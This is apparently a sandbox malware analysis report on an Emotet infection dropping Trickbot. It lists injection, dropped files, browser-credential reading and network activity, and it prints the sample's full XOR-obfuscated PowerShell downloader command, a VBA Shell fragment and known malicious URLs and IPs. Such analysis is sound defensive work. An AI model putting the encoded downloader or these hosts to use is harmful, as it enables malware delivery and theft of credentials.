Emotet Drops Trickbot (25-Jun-18)

Severity	Category	Operation	Classification
5/5	Injection	Writes into the memory of a process running from a created or modified executable	-
"c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe" modifies memory of "c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe" ... VTI Actions Go to Function Call
"c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe" modifies memory of "c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe" ... VTI Actions Go to Function Call
"c:\programdata\oyvgkgw.exe" modifies memory of "c:\programdata\oyvgkgw.exe" ... VTI Actions Go to Function Call
5/5	Injection	Modifies control flow of a process running from a created or modified executable	-
"c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe" alters context of "c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe" ... VTI Actions Go to Function Call
"c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe" alters context of "c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe" ... VTI Actions Go to Function Call
"c:\programdata\oyvgkgw.exe" alters context of "c:\programdata\oyvgkgw.exe" ... VTI Actions Go to Function Call
4/5	Process	Creates process	-
Creates process "PowersHell -join ((98,49 , 44 , 1 , 123 ,40 , 35 , 49, 107 ,41 ,36 ,44 , 35 ,37 ,50 ,102,8 ,35, 50, 104 , 17 , 35, 36 ,5 ,42, 47,35 , 40 , 50 , 125, 98,54, 50,4,123 , 97 , 46,50, 50 , 54 , 124,105 ,105, 37,41, 43, 54, 52 , 35 ,39, 42 ,43 ,104 , 40,35, 50,105 , 49 ,41 , 52 , 34, 54, 52 , 35, 53 , 53 ,105 ,119, 49, 9 ,44, 45 , 46 ,35 , 31,3, 126 ,105, 6, 46,50, 50, 54,124,105 , 105, 49,49,49 , 104,47,37 ,36, 104,37, 42 , 105 ,28, 62,39 , 48 ,41,2 , 35, 105, 6 ,46 ,50,50 ,54 , 124 , 105 ,105 , 49 , 49, 49 , 104 , 37 , 46 , 51, 40 , 33, 37 , 51, 53 ,39,43 ,53 , 41 ,52 , 39 , 54,52,47,43, 47 ,35 , 52 , 104, 37 ,41 , 43,105 ,2,17 ,126 ,34 , 30 , 35, 105, 6 ,46, 50 , 50,54,124 ,105,105 ,53 , 35 , 52, 48 ,47,37 , 35 , 107 ,54, 37, 104 ,37, 41 ,43, 104,52 ,41 , 105,113, 41 , 127, 41 , 54,11,31, 105 ,6, 46 ,50, 50 , 54 , 124, 105, 105 , 43 , 47 ,40 , 39, 43 , 47,104 ,37 , 41,43,104,50 ,49 , 105, 22, 114, 19, 2 ,1,54 , 105 ,97 ,104, 21 ,54 , 42,47 , 50 , 110 ,97 , 6,97,111 ,125, 98 , 0 , 28, 23, 102 , 123, 102 , 97 , 116, 126 ,118 , 97 , 125, 98, 9, 51 ,44, 123 , 98 , 35,40 , 48 ,124 , 50 , 35, 43,54 ,109 , 97 ,26 ,97,109, 98,0 , 28 , 23,109 , 97 ,104 , 35 , 62, 35,97 , 125 , 32 ,41 ,52 ,35 ,39,37,46, 110 , 98, 7 , 19, 19 ,102 , 47,40,102, 98,54 ,50 , 4 , 111 , 61,50 , 52 ,63 ,61 , 98, 49, 44 ,1,104,2 ,41 ,49 ,40 ,42,41,39 , 34 ,0 ,47 ,42 ,35 , 110 , 98, 7, 19,19,106 ,102,98 ,9,51,44, 111,125 , 21 ,50, 39 , 52 ,50, 107 ,22 ,52, 41,37, 35 ,53 , 53 ,102, 98 ,9 , 51, 44 ,125, 36 , 52, 35 ,39, 45,125 , 59 , 37 , 39 , 50, 37 ,46,61, 59 ,59 ) \|%{ [CHAR]($_ -bXor"0x46" )} ) \| . ( $ENv:COmSpeC[4,24,25]-Join'') ". ... VTI Actions Go to Function Call
Creates process "C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe". ... VTI Actions Go to Function Call
Creates process "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe". ... VTI Actions Go to Function Call
Creates process "C:\ProgramData\oyvGkGw.exe". ... VTI Actions Go to Function Call
Creates process ""C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp"". ... VTI Actions Go to Function Call
Creates process ""C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp"". ... VTI Actions Go to Function Call
Creates process ""C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp"". ... VTI Actions Go to Function Call
Creates process ""C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp"". ... VTI Actions Go to Function Call
Creates process "C:\Windows\system32\cmd.exe". ... VTI Actions Go to Function Call
4/5	Information Stealing	Reads browser data	-
Possibly trying to readout browser credentials. ... VTI Actions Go to Function Call
4/5	Network	Downloads data	Downloader
URL "www.icb.cl/ZxavoDe/". ... VTI Actions Go to Function Call
URL "197.245.46.11". ... VTI Actions Go to Function Call
URL "216.46.44.93". ... VTI Actions Go to Function Call
URL "94.70.244.227". ... VTI Actions Go to Function Call
3/5	Network	Performs DNS request	-
Resolves host name "comprealm.net". ... VTI Actions Go to Function Call
Resolves host name "www.icb.cl". ... VTI Actions Go to Function Call
3/5	Browser	Reads data related to browsing history	-
Reads the browsing history for "Microsoft Internet Explorer". ... VTI Actions Go to Function Call
3/5	PE	Executes dropped PE file	-
Executes dropped file "c:\users\kft6utqw\appdata\local\temp\280.exe". ... VTI Actions Go to File Details Go to Function Call
Executes dropped file "c:\programdata\oyvgkgw.exe". ... VTI Actions Go to File Details Go to Function Call
Executes dropped file "c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe". ... VTI Actions Go to File Details Go to Function Call
2/5	File System	Associated with suspicious files	Exploit
File "c:\users\kft6utqw\appdata\local\temp\280.exe" is a known suspicious file. ... VTI Actions Go to File Details Go to Function Call
2/5	Network	Associated with known malicious/suspicious URLs	-
URL "197.245.46.11" is known as malicious URL. ... VTI Actions Go to Function Call
URL "216.46.44.93" is known as malicious URL. ... VTI Actions Go to Function Call
2/5	Network	Connects to HTTP server	-
URL "www.icb.cl/ZxavoDe/". ... VTI Actions Go to Function Call
URL "197.245.46.11". ... VTI Actions Go to Function Call
URL "216.46.44.93". ... VTI Actions Go to Function Call
URL "http://94.70.244.227:80/whoami.php". ... VTI Actions Go to Function Call
URL "94.70.244.227". ... VTI Actions Go to Function Call
2/5	PE	Drops PE file	Dropper
Drops file "c:\users\kft6utqw\appdata\local\temp\280.exe". ... VTI Actions Go to File Details Go to Function Call
Drops file "c:\programdata\oyvgkgw.exe". ... VTI Actions Go to File Details Go to Function Call
Drops file "c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe". ... VTI Actions Go to File Details
2/5	VBA Macro	Executes application	-
DmvtdQv = DtEFQrZRRpI + HYmQfXj + Shell(WzPZHVRYA + whKqOB + haTFtqcwzK, (20827 / 20827) - 1) ... VTI Actions
1/5	Process	Creates system object	-
Creates mutex with name "Global\.net clr networking". ... VTI Actions Go to Function Call
Creates mutex with name "PEMA08". ... VTI Actions Go to Function Call
Creates mutex with name "PEMB40". ... VTI Actions Go to Function Call
Creates mutex with name "Global\I78B0A7D7". ... VTI Actions Go to Function Call
Creates mutex with name "Global\M78B0A7D7". ... VTI Actions Go to Function Call
Creates mutex with name "PEMB50". ... VTI Actions Go to Function Call
Creates mutex with name "PEMB64". ... VTI Actions Go to Function Call
Creates mutex with name "Global\Nx357ECDE7". ... VTI Actions Go to Function Call
Creates nameless mutex. ... VTI Actions Go to Function Call
1/5	VBA Macro	Executes macro on specific worksheet event	-
Executes macro on "Activate Workbook" event. ... VTI Actions

Notifications (1/1)

Before

After